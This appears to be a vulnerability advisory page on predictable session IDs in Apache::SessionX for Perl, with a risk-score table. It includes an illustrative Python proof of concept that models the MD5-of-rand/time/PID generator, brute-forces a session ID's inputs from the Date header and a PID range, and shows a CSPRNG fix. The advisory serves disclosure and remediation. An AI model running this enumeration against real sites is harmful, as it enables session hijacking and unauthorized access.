Apache SessionX Insecure Session ID Generation Vulnerability

Vulnerability

Apache::SessionX for Perl, in versions through 2.01, generates session IDs insecurely. The default generator, Apache::SessionX::Generate::MD5, derives each ID from an MD5 hash of the output of Perl's built-in rand() function, the current epoch time, and the process ID (PID). Each of these inputs carries little entropy: the PID is drawn from a small range of values, the epoch time can be narrowed to a window of a few seconds and may be read directly from the server's HTTP Date header, and rand() is a deterministic pseudo-random generator that is not suitable for cryptographic use. Hashing with MD5 adds no entropy, so the ID is only as unpredictable as its inputs. An attacker who can bound those inputs can enumerate the candidate IDs, predict a valid session ID, hijack the session and gain unauthorized access to the application.
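As an added example (not code from this page or from the Apache::SessionX project), the following Python models the construction the advisory describes and shows, from the attacker's side, why bounded inputs make the ID recoverable by enumeration. The exact string layout hashed by Apache::SessionX::Generate::MD5, the resolution of rand() output, the PID range and the time window are all assumptions chosen for illustration; the search-space arithmetic is general and the CSPRNG replacement is the fix a practitioner would apply.

```python
"""Model of the session-ID construction the advisory describes, with the
attacker's brute-force recovery and a CSPRNG-based replacement.

Added example: the string layout hashed, the width of rand() output, the PID
range and the time window are assumptions, not Apache::SessionX's code."""
import hashlib
import math
import random
import secrets


def weak_session_id(epoch: int, pid: int, rand_bucket: int, rand_bits: int) -> str:
    """MD5 over rand() output, epoch time and PID (assumed concatenation order).

    rand() is modelled as an integer in [0, 2**rand_bits) scaled to [0, 1),
    i.e. a generator whose output has only rand_bits of resolution.
    MD5 adds no entropy: the ID is exactly as guessable as its three inputs.
    """
    rand_value = rand_bucket / (1 << rand_bits)
    material = f"{epoch}{rand_value}{pid}".encode()
    return hashlib.md5(material).hexdigest()


def search_space_bits(window_seconds: int, pid_count: int, rand_bits: int) -> float:
    """Entropy the attacker actually faces: log2 of the (time, pid, rand) triples
    left when the time is known to within +/- window_seconds."""
    candidates = (2 * window_seconds + 1) * pid_count * (1 << rand_bits)
    return math.log2(candidates)


def recover_session_inputs(target_id, date_header_epoch, window_seconds, pid_range, rand_bits):
    """Attacker side: enumerate every (epoch, pid, rand) triple consistent with
    what is observable (Date header, plausible PIDs, rand() resolution) and
    return the one that reproduces the targeted ID, or None if none does."""
    for epoch in range(date_header_epoch - window_seconds, date_header_epoch + window_seconds + 1):
        for pid in pid_range:
            for bucket in range(1 << rand_bits):
                if weak_session_id(epoch, pid, bucket, rand_bits) == target_id:
                    return epoch, pid, bucket
    return None


def secure_session_id(nbytes: int = 16) -> str:
    """Replacement: 128 bits from the OS CSPRNG; no observable input narrows it."""
    return secrets.token_hex(nbytes)


def demo() -> dict:
    """Issue one weak ID with deliberately small parameters so the search runs in
    seconds, then recover its inputs knowing only the ranges. Constructed values."""
    epoch, pid, rand_bits = 1_000_000_000, 4242, 8          # assumed server state
    server_rng = random.Random(7)                            # stands in for rand()
    bucket = server_rng.getrandbits(rand_bits)
    issued = weak_session_id(epoch, pid, bucket, rand_bits)
    recovered = recover_session_inputs(
        issued,
        date_header_epoch=epoch + 1,        # Date header read one second later
        window_seconds=2,
        pid_range=range(4200, 4300),        # attacker's estimate of the PID range
        rand_bits=rand_bits,
    )
    return {"issued": issued, "actual": (epoch, pid, bucket), "recovered": recovered}


if __name__ == "__main__":
    r = demo()
    print("issued   :", r["issued"])
    print("recovered:", r["recovered"], "matches" if r["recovered"] == r["actual"] else "no match")
    # Historical-scale parameters: 15-bit rand(), 32768 PIDs, time known to +/- 2 s.
    print(f"weak generator: ~{search_space_bits(2, 32768, 15):.1f} bits of search")
    print(f"secure generator: {8 * 16} bits, e.g. {secure_session_id()}")
```

The point of `search_space_bits` is that the work factor is the product of the three input ranges, not the 128-bit width of the MD5 output: with a 15-bit rand(), a 32768-entry PID space and the time pinned to a few seconds, the whole space is on the order of 2^32 hashes, which is a single machine's work. The demo shrinks those ranges so the run finishes quickly; the same loop with the larger parameters is only slower, not harder.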

Impact

Because the session IDs are predictable, an attacker can guess or reproduce a valid ID without credentials, hijack the corresponding authenticated session, and gain unauthorized access to the application with that user's privileges.

Added: Feb 27, 2026, 12:31 AM
Updated: Feb 27, 2026, 12:31 AM

Vulnerability Rating

Custom Algorithm
spread          0.0
impact          1.3
exploitability  7.3
remediation     0.0
relevance       3.3
threat          3.2
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.